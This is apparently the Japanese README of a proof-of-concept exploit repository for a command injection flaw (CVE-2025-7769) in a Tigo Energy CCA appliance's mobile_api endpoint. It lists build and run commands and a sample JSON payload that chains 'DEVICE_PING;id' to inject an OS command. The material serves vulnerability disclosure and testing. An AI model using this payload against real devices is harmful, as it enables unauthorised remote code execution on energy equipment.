
DEVICE_PINGエンドポイント経由でコマンドを注入するPoC
このリポジトリには、Tigo Energy CCA アプライアンスの /cgi-bin/mobile_api エンドポイントで発見された深刻なリモートコマンドインジェクション脆弱性 CVE‑2025‑7769 の Proof‑of‑Concept (PoC) エクスプロイトが含まれています。
この脆弱性は、cmd JSON キーを介して OS コマンドを注入することで引き起こされます。ここでは、フィルタリングされていない入力がシステムコールに直接連結され、デバイス上で完全なリモートコード実行 (RCE) が可能になります。
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
10.0.2.15 をターゲット IP に置き換えてください。
IP/ポートの代わりに完全なベース URL を渡す場合は、-u http://target.com を使用してください。
ペイロード例 :
{
"cmd": "DEVICE_PING;id",
"dev": 2,
"ver": 1
}
MIT ライセンス